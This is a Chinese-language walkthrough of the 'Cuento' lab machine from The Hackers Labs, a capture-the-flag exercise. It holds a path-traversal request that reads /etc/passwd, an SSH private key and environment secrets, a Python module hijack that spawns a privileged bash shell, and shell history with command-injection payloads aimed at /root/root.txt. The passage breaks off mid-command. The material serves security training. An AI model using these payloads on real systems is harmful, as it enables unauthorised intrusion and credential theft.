The Hackers Labs - Cuento
摘要:本文记录了一次完整的渗透测试过程。首先通过ARP扫描发现目标IP 192.168.81.61,使用Nmap扫描发现开放了22(SSH)和8080(HTTP)端口。利用AWVS扫描发现Next.js存在任意文件读取漏洞,成功读取/etc/passwd文件获取用户列表。通过读取/proc/self/environ环境变量发现密码"ratonguaton",成功SSH登录rat
·
信息收集
用arp收索一下ip
┌──(root㉿kali)-[~] └─# arp-scan -I eth0 -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:04:d2:0f, IPv4: 192.168.81.26 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.81.61 08:00:27:17:43:b4 PCS Systemtechnik GmbH 192.168.81.189 f0:20:ff:13:f9:a2 (Unknown) 192.168.81.181 e6:34:88:c9:d0:6f (Unknown: locally administered) 192.168.81.181 e6:34:88:c9:d0:6f (Unknown: locally administered) (DUP: 2) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.950 seconds (131.28 hosts/sec). 3 responded
namp扫一下端口
┌──(root㉿kali)-[~]
└─# nmap -sC -sV 192.168.81.61 -n -vv -min-rate=2000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 15:45 CST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
Initiating ARP Ping Scan at 15:45
Scanning 192.168.81.61 [1 port]
Completed ARP Ping Scan at 15:45, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:45
Scanning 192.168.81.61 [65535 ports]
Discovered open port 8080/tcp on 192.168.81.61
Discovered open port 22/tcp on 192.168.81.61
SYN Stealth Scan Timing: About 45.95% done; ETC: 15:46 (0:00:36 remaining)
Completed SYN Stealth Scan at 15:46, 65.73s elapsed (65535 total ports)
Initiating Service scan at 15:46
Scanning 2 services on 192.168.81.61
Completed Service scan at 15:48, 101.21s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.81.61.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 7.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 1.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
Nmap scan report for 192.168.81.61
Host is up, received arp-response (0.00088s latency).
Scanned at 2026-01-03 15:45:21 CST for 175s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:20:27:6a:11:ad:9e:32:d5:55:e0:45:50:7a:22:32 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCr2GTskjClaQ1erFcfJ3LtUy9qsUhJm7RJkZefyf631WUk7ikq13G91ChtLezxnh0aM6Jv775G7IoNsHVBdUBafSEnzvd6iaFHio+jd7TsDjjZYIqSSgSoAvm1j+pq0xZDKMvkRt89Xh2f7UPhOuZo5XrbXTOhBAYS0T9jP80FA9f58mGIThB9d3PCofZGsZLq7qM8eKe9avxh1rmOaDcDMdBV4QsNzbahwncvEuU1mBYNtsIuKou3qAKNlWcmZIGqayt30Umb4UNQlhWRupyQp+nnqSdk4TWUOTbDw4P9wnbjejOiVeLDu4FI/2RbmtxN7vyx0x8fbNGR+jazR5mdi9Jv5rHketsk0jcEQStyMbnfJX6jQX2hEVOpw7Dhh2MxBLE8RkBnMxb8Z6viaeYPivsDi3vhR1VkaBmcBK8wBJ0UIpuMDYoUO/AAJwwKHcsBePaqbwWbYJwq1CnYrbXYC6ZRrx7tynjBKXXHrVppPF+RX2dfzJl70MXRYJghRlE=
| 256 8b:28:87:e5:78:c7:ed:1d:eb:ea:5c:3e:04:f3:2a:64 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCUlAuupJU/WHnO2vAQ1lb30o58sGEIEqD2OoWIR9v7rWx3R9ilM6sozjhfx0CmNHCXPuksaofzASumqoWmK7Rg=
| 256 61:ab:7f:f0:31:f5:73:6b:4b:5b:d5:2f:a8:b5:32:4c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGHECYlrjWKvrvsgmeI6gitgSZ97SvOUzfWruE6mhTBW
8080/tcp open http-proxy syn-ack ttl 64
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200
| Content-Type: text/html
| Content-Length: 3928
| Cache-Control: public, max-age=3600
| <html>
| <style>
| .chat-container {
| max-width: 800px;
| margin: 0 auto;
| padding: 20px;
| font-family: sans-serif;
| </style>
| <body>
| <div id="ai-search-container" style="position: relative; width: 100%; max-width: 800px; margin: 20px auto;">
| <div class="search-box" style="display: flex; gap: 10px; padding: 10px;">
| <input
| type="text"
| id="ai-search-input"
| placeholder="Ask a question"
| style="flex-grow: 1; padding: 12px; border: 2px solid #FFD12F; border-radius: 8px; font-size: 16px;"
| <button
| id="ai-search-button"
|_ style="padding: 12px 24px; background: #FFD12F; border: none; border-radius: 8px; color: #1B4D7A; font-weight: bold; cursor: pointer;"
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.95%I=7%D=1/3%Time=6958C959%P=x86_64-pc-linux-gnu%r(Get
SF:Request,FBC,"HTTP/1\.1\x20200\r\nContent-Type:\x20text/html\r\nContent-
SF:Length:\x203928\r\nCache-Control:\x20public,\x20max-age=3600\r\n\r\n<ht
SF:ml>\n<style>\n\x20\.chat-container\x20{\n\x20\x20\x20\x20max-width:\x20
SF:800px;\n\x20\x20\x20\x20margin:\x200\x20auto;\n\x20\x20\x20\x20padding:
SF:\x2020px;\n\x20\x20\x20\x20font-family:\x20sans-serif;\n\x20\x20}\n</st
SF:yle>\n\n<body>\n\x20\x20<div\x20id=\"ai-search-container\"\x20style=\"p
SF:osition:\x20relative;\x20width:\x20100%;\x20max-width:\x20800px;\x20mar
SF:gin:\x2020px\x20auto;\">\n\x20\x20\x20\x20<div\x20class=\"search-box\"\
SF:x20style=\"display:\x20flex;\x20gap:\x2010px;\x20padding:\x2010px;\">\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20<input\x20\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20type=\"text\"\x20\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20id=\"ai-search-input\"\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20placeholder=\"Ask\x20a\x2
SF:0question\"\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20style=\"flex-grow:\x201;\x20padding:\x2012px;\x20border:\x202px\x20so
SF:lid\x20#FFD12F;\x20border-radius:\x208px;\x20font-size:\x2016px;\"\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20>\n\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<button\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20i
SF:d=\"ai-search-button\"\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20style=\"padding:\x2012px\x2024px;\x20background:\x20#FFD12F;\x
SF:20border:\x20none;\x20border-radius:\x208px;\x20color:\x20#1B4D7A;\x20f
SF:ont-weight:\x20bold;\x20cursor:\x20pointer;\"\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20>\n\x20\x20\x20")%r(HTTPOptions,FBC,"HTTP/1\.1\x20200\r\nCo
SF:ntent-Type:\x20text/html\r\nContent-Length:\x203928\r\nCache-Control:\x
SF:20public,\x20max-age=3600\r\n\r\n<html>\n<style>\n\x20\.chat-container\
SF:x20{\n\x20\x20\x20\x20max-width:\x20800px;\n\x20\x20\x20\x20margin:\x20
SF:0\x20auto;\n\x20\x20\x20\x20padding:\x2020px;\n\x20\x20\x20\x20font-fam
SF:ily:\x20sans-serif;\n\x20\x20}\n</style>\n\n<body>\n\x20\x20<div\x20id=
SF:\"ai-search-container\"\x20style=\"position:\x20relative;\x20width:\x20
SF:100%;\x20max-width:\x20800px;\x20margin:\x2020px\x20auto;\">\n\x20\x20\
SF:x20\x20<div\x20class=\"search-box\"\x20style=\"display:\x20flex;\x20gap
SF::\x2010px;\x20padding:\x2010px;\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<input\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ty
SF:pe=\"text\"\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20id=\"ai-search-input\"\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20placeholder=\"Ask\x20a\x20question\"\x20\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20style=\"flex-grow:\x201;\x20paddi
SF:ng:\x2012px;\x20border:\x202px\x20solid\x20#FFD12F;\x20border-radius:\x
SF:208px;\x20font-size:\x2016px;\"\n\x20\x20\x20\x20\x20\x20\x20\x20\x20>\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20<button\x20\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20id=\"ai-search-button\"\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20style=\"padding:\x2012px\x
SF:2024px;\x20background:\x20#FFD12F;\x20border:\x20none;\x20border-radius
SF::\x208px;\x20color:\x20#1B4D7A;\x20font-weight:\x20bold;\x20cursor:\x20
SF:pointer;\"\n\x20\x20\x20\x20\x20\x20\x20\x20\x20>\n\x20\x20\x20");
MAC Address: 08:00:27:17:43:B4 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.25 seconds
Raw packets sent: 131121 (5.769MB) | Rcvd: 55 (2.404KB)
去8080访问后发现是一个对话窗口,但并没有发现什么用。用dirsearch了一下并没发现什么!
┌──(root㉿kali)-[~] └─# dirsearch dir -u http://192.168.81.61:8080/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.81.61_8080/__26-01-03_15-53-45.txt Target: http://192.168.81.61:8080/ [15:53:45] Starting: [15:53:46] 200 - 181B - /.cask [15:53:48] 200 - 186B - /.gradletasknamecache [15:53:49] 200 - 164B - /.idea/tasks.xml [15:53:50] 404 - 126B - /.png [15:53:51] 200 - 186B - /.rakeTasks [15:53:52] 200 - 186B - /.stylish-haskell.yaml [15:53:52] 200 - 173B - /.vscode/tasks.json [15:53:55] 404 - 265B - /a4j/s/3_3_3.Finalorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/ [15:53:56] 200 - 168B - /actuator/;/scheduledtasks [15:53:56] 200 - 186B - /actuator/scheduledtasks [15:54:01] 404 - 156B - /admin_my_avatar.png [15:54:05] 200 - 164B - /api/cask/graphql [15:54:05] 404 - 176B - /api/swagger/static/index.html [15:54:05] 500 - 54B - /api/whoami [15:54:07] 404 - 144B - /base/static/c [15:54:13] 404 - 156B - /doc/html/index.html [15:54:13] 404 - 168B - /docs/html/admin/ch01.html [15:54:13] 404 - 174B - /docs/html/admin/ch01s04.html [15:54:13] 404 - 174B - /docs/html/admin/ch03s07.html [15:54:13] 404 - 170B - /docs/html/admin/index.html [15:54:13] 404 - 176B - /docs/html/developer/ch02.html [15:54:13] 404 - 182B - /docs/html/developer/ch03s15.html [15:54:13] 404 - 158B - /docs/html/index.html [15:54:13] 200 - 173B - /druid/indexer/v1/taskStatus [15:54:14] 404 - 197B - /examples/jsp/%252e%252e/%252e%252e/manager/html/ [15:54:16] 404 - 127B - /html/ [15:54:17] 404 - 143B - /html/cgi-bin/ [15:54:17] 404 - 146B - /html/config.rb [15:54:17] 404 - 190B - /html/js/misc/swfupload/swfupload.swf [15:54:17] 404 - 196B - /html/js/misc/swfupload/swfupload_f9.swf [15:54:17] 404 - 191B - /html/js/misc/swfupload//swfupload.swf [15:54:19] 200 - 181B - /jbpm-console/app/tasks.jsf [15:54:21] 404 - 143B - /manager/html/ [15:54:22] 200 - 168B - /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https [15:54:27] 404 - 180B - /phpmyadmin/docs/html/index.html [15:54:27] 404 - 178B - /phpmyadmin/doc/html/index.html [15:54:28] 404 - 162B - /public_html/robots.txt [15:54:30] 200 - 164B - /scheduledtasks [15:54:31] 200 - 164B - /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https [15:54:33] 404 - 164B - /static/api/swagger.json [15:54:33] 404 - 164B - /static/api/swagger.yaml [15:54:33] 404 - 148B - /static/dump.sql [15:54:34] 200 - 173B - /tasks/ [15:54:37] 404 - 142B - /web/static/c Task Completed
用AWVS扫描一下发现了一个Next.js中任意读取的文件
然后通过yakit进行抓包成功读取了/etc/passwd
然后找到可以远程登录的用户
┌──(root㉿kali)-[~] └─# >echo " news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:116::/nonexistent:/usr/sbin/nologin avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin cups-pk-helper:x:113:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin lightdm:x:114:122:Light Display Manager:/var/lib/lightdm:/bin/false speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false avahi:x:116:124:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin kernoops:x:117:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin saned:x:118:126::/var/lib/saned:/usr/sbin/nologin hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false whoopsie:x:120:127::/nonexistent:/bin/false colord:x:121:128:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin fwupd-refresh:x:122:129:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin pulse:x:123:130:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin vboxuser:x:1000:1000:vboxuser,,,:/home/vboxuser:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin raton:x:1001:1001::/home/raton:/bin/bash sshd:x:124:65534::/run/sshd:/usr/sbin/nologin odoo:x:125:134:odoo,,,:/opt/odoo:/bin/bash postgres:x:126:135:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash grafana:x:127:136::/usr/share/grafana:/bin/false churrumais:x:1002:1002::/home/churrumais:/bin/sh log_agent:x:128:138::/home/log_agent:/usr/sbin/nologin " | grep bash root:x:0:0:root:/root:/bin/bash vboxuser:x:1000:1000:vboxuser,,,:/home/vboxuser:/bin/bash raton:x:1001:1001::/home/raton:/bin/bash odoo:x:125:134:odoo,,,:/opt/odoo:/bin/bash postgres:x:126:135:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
然后再利用LFI漏洞读取ssh密钥试试,成功获得raton的ssh密钥
HTTP/1.1 200 Content-Type: application/octet-stream Cache-Control: public, max-age=3600 Content-Length: 2602 -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAsMkzQei/qLcWMPi/ms0FtcHl7x2DxOmE5s0Kr2reirNLtID0EFnL BvHztXGfuVPfu9v3NQ2o/jphRuIQ9HUtVwr5HQ4PAxVyxwH0rYt5rEFz5CBdU+HOlUrkQR fN9dN1eivlYXDnkBSNo+fvIe5gicoFa3MBX403hcyT18fouNUcZ69Uai87dCP5gA6AgmRQ ODTpaomGrvjiQymcV6LJAlFCQZ9gY2HPv/ht1Y0ym2XYLpCSo21ZAnUmHuYiWFpRSq8HJ2 uccJX1vtBCjwl9m1X/P0k0KuWHVyQjRQMSOIfHobw/ARTFOhaQHlwm81/XyG6tNSDvdQau kA9dDuBDda926KdG7/8wgBINS3514H4OuDY9sm0DVyfQ3cXNYeTpHtGbnQnWsNboTuZTFd ha7Wcjmgrncr7udZNH8iYAstrpmNuyot9wLekzjqonjdEJtaQeenKlLuPDRGfyJkncwpoT pOq7n4kQ2N1dKGHB7oaNHPIFOnLyuH15A8kchhUPAAAFiNLeG97S3hveAAAAB3NzaC1yc2 EAAAGBALDJM0Hov6i3FjD4v5rNBbXB5e8dg8TphObNCq9q3oqzS7SA9BBZywbx87Vxn7lT 37vb9zUNqP46YUbiEPR1LVcK+R0ODwMVcscB9K2LeaxBc+QgXVPhzpVK5EEXzfXTdXor5W Fw55AUjaPn7yHuYInKBWtzAV+NN4XMk9fH6LjVHGevVGovO3Qj+YAOgIJkUDg06WqJhq74 4kMpnFeiyQJRQkGfYGNhz7/4bdWNMptl2C6QkqNtWQJ1Jh7mIlhaUUqvBydrnHCV9b7QQo 8JfZtV/z9JNCrlh1ckI0UDEjiHx6G8PwEUxToWkB5cJvNf18hurTUg73UGrpAPXQ7gQ3Wv duinRu//MIASDUt+deB+Drg2PbJtA1cn0N3FzWHk6R7Rm50J1rDW6E7mUxXYWu1nI5oK53 K+7nWTR/ImALLa6ZjbsqLfcC3pM46qJ43RCbWkHnpypS7jw0Rn8iZJ3MKaE6Tqu5+JENjd XShhwe6GjRzyBTpy8rh9eQPJHIYVDwAAAAMBAAEAAAGATVGCCIZ6JJkGrJ5udo7Ku4a1QN JAykNzq9nrnXL5J+Jo7uYjWG9dO4lglG/Acra7OJdo1BxIWABCgVToI3KIRPR4pXt7l1av H1i8oZZJvcvWmuSIzOIKjwL1N37oxmYYkDlYljhiHoLOu+v5i3aNZFYl7qua4yaJLQyfcJ VvND+Ir9Rf8Bz+PLprKdWt4NlsuFhz6fOCI06Y7tTpGu8ISOovNzI0XuLtkMFfkDGz+4Ec fqkeaTmu30NLS+JNDSVahF2pmYCohEsJSVXwWRD1J3JNM0qysvvSZ+ibyLRlN7Sx0sZrg0 ve0nm5kaVfA9RGrj9vwWC/jgKnjIwFJX6wS/1OgOmVKTCxrkbhg27n529lHdsvkQBCqcN1 Lx/izzBCxl0VoPO4RprLe4XM7PRzzs/3AQ7T2GyVkz4mGBcoPKJppY1QHhgKWRmwaLS/TU cj+Ljp6ZgcmtMwwEBX1z15BY6q0zL8Q4F1ye+tWTTjlQzFKyv/IDeSUCMT2u36xV/pAAAA wQCADhdOgz6XzlA5jFUY4EB479oESLQ1Matj5cy9Qmg2mzATZjoFri0KV+W19hQ7sXnROk UxYi4+KIiz4ti34jxkEt+I/iLl1Gcu/4E5g4XOzhmuE4bfLYeomZy8s3GT2d+EtHvLjfa+ 7gQWVelcv4F0Fo+z1phXD6djP9K+rA6a9kST5la1xnvzR1G38ckUewWiuowhR3+0+r16q6 qhO0t8QnMaaAQO6Q1JIckJbfUslD8HxV5+Zb+Jgy2RPcXTc6YAAADBANbzRIMMXKnJuoee 6HZBAYnqjpkZKaQvSEN1XYdfj62CnTMmUIPueI5Kxn4wvgZ3pTLpHXZxdK/kg+IdcX4AkU 6Vb45noVWWdgPURlvgWppLoNRduGAwU1bH/dGBONBT1JG1H5ePoFamRJjKks6ns0JyzvkD GKwoMwAFcVh1XSGB1FGxhGLD0hP0DS9xqfme3Mlpvvl7RuTUzC+nuutKbEcqTFYKTBVjW1 L4uDh3dvKXO7Kdxg9qIDmg0HtYKAEX2wAAAMEA0owcmzlaZsNABrqoI506X8nWwZuensSz 62buYnl9Dutk3aLe3tQhOczOLWblVnJMhB9S8139hMNff3F0Oq23wW4xj2zdpACwIlVEu0 s6s18XEycPPOSC04vyJErsFiS3Ww1a0rnoqhAKCQigAJWLvvZ1OCsx1x3vd9fLxfzEXZpM KV68Xyt3gfaQwAIyVzxEBUE3vuVurc5OSHZxF3UCeWKcO7h4/BHH0eLUI/lcrX8RCdwd+i ooiLpFyaIAAIfdAAAADXJhdG9uQGN1ZW50b3MBAgMEBQ== -----END OPENSSH PRIVATE KEY-----
我还以为可以用ssh成功上去了但事事难预料呀!结果用ssh链接时发生报错,不能用密钥登录,还是要用密码!
┌──(root㉿kali)-[/opt/zd] └─# ssh raton@192.168.81.61 -i id2 The authenticity of host '192.168.81.61 (192.168.81.61)' can't be established. ED25519 key fingerprint is: SHA256:YDTCNmlEFWKraxkJLyrJ2iclum6c/Vb9y9T2ARxG0gI This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.81.61' (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html raton@192.168.81.61's password: Permission denied, please try again. raton@192.168.81.61's password: Permission denied, please try again. raton@192.168.81.61's password: raton@192.168.81.61: Permission denied (publickey,password).
经过一段收索,最终还是要用LFI读取文件,经过搜索发现环境变量中竟然有一个密码 SNOWFLAKE_PASSWORD=ratonguaton
GET /static/../../../../../proc/self/environ HTTP/1.1 Host: 192.168.81.61:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 HTTP/1.1 200 Content-Type: application/octet-stream Cache-Control: public, max-age=3600 Content-Length: 699 LANG=en_US.UTF-8 LANGUAGE=en_US: LC_ADDRESS=es_MX.UTF-8 LC_IDENTIFICATION=es_MX.UTF-8 LC_MEASUREMENT=es_MX.UTF-8 LC_MONETARY=es_MX.UTF-8 LC_NAME=es_MX.UTF-8 LC_NUMERIC=es_MX.UTF-8 LC_PAPER=es_MX.UTF-8 LC_TELEPHONE=es_MX.UTF-8 LC_TIME=es_MX.UTF-8 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin HOME=/home/raton LOGNAME=raton USER=raton SHELL=/bin/bash INVOCATION_ID=1abdc01495ee436ebdcbce4b4d454580 JOURNAL_STREAM=8:23242 AZURE_OPENAI_API_KEY=sk-example1234567890abcdef1234567890 AZURE_OPENAI_ENDPOINT=https://example.openai.azure.com/ AZURE_OPENAI_API_VERSION=2023-05-15 SNOWFLAKE_ACCOUNT=myorg-myaccount SNOWFLAKE_USER=user_new SNOWFLAKE_PASSWORD=ratonguaton PORT=8080
然后输入这个密码成功上去了!
提权
上去后发现目录下有很多文件,先看看sudo能用不!发现能用,通过尝试最后决定通过劫持进行提取!提权到churrumais成功!
raton@cuentos:~/Desktop$ sudo -l
Matching Defaults entries for raton on cuentos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User raton may run the following commands on cuentos:
(churrumais) NOPASSWD: /usr/bin/python3 /home/raton/Desktop/raton.py
aton@cuentos:~/Desktop$ ls -al /home/raton/Desktop/raton.py
-rw-r--r-- 1 root root 23665 sep 16 01:33 /home/raton/Desktop/raton.py
raton@cuentos:~/Desktop$ ls -al
total 60
drwxrwxr-x 2 raton raton 4096 ene 3 09:02 .
drwxr-xr-x 12 raton raton 4096 sep 16 00:46 ..
-rwxrwxr-x 1 raton raton 38 ene 3 09:02 random.py
-rw-r--r-- 1 root root 23665 sep 16 01:33 raton.py
-rwxr-xr-x 1 root root 20701 ago 25 01:30 raton.py.save
raton@cuentos:~/Desktop$ cat random.py
import os;
os.system('/bin/bash -p');
raton@cuentos:~/Desktop$ sudo -u churrumais /usr/bin/python3 /home/raton/Desktop/raton.py
churrumais@cuentos:/home/raton/Desktop$
上去churrumais后直接到用户目录下去看一下发现,有.bash_history的日志没有删除!
churrumais@cuentos:~$ ls -al total 68 drwxr-xr-x 6 churrumais churrumais 4096 dic 9 12:26 . drwxr-xr-x 4 root root 4096 sep 12 23:14 .. -rw------- 1 churrumais churrumais 8337 ene 3 09:19 .bash_history -rw-r--r-- 1 churrumais churrumais 220 feb 25 2020 .bash_logout -rw-r--r-- 1 churrumais churrumais 3811 sep 14 00:44 .bashrc drwx------ 2 churrumais churrumais 4096 sep 14 00:53 .cache drwxr-xr-x 5 churrumais churrumais 4096 sep 14 00:53 .config drwxrwxr-x 3 churrumais churrumais 4096 sep 11 16:55 .local -rw-r--r-- 1 churrumais churrumais 807 feb 25 2020 .profile drwxrwxr-x 2 churrumais churrumais 4096 dic 9 12:26 .ssh -rw-rw-r-- 1 churrumais churrumais 1048 dic 9 12:18 system_report_20251209_121827.json -rw-rw-r-- 1 churrumais churrumais 1049 dic 9 12:19 system_report_20251209_121933.json -rw-rw-r-- 1 churrumais churrumais 1033 dic 9 12:21 system_report_20251209_122120.json -rw-r--r-- 1 churrumais churrumais 1600 abr 8 2020 .Xdefaults -rw-r--r-- 1 churrumais churrumais 14 abr 8 2020 .xscreensaver churrumais@cuentos:~$ cat .bash_history ls -l ps aux | grep loganalyzer cat /opt/loganalyzer/app.py curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' -r curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' -l curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' -L curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #" curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #" cat /tmp/cookies.txt curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #" curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; id #" curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; id #" curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' rm /tmp/cookies.txt curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' cat /tmp/cookies.txt curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d 'filter=' ; id #' curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p 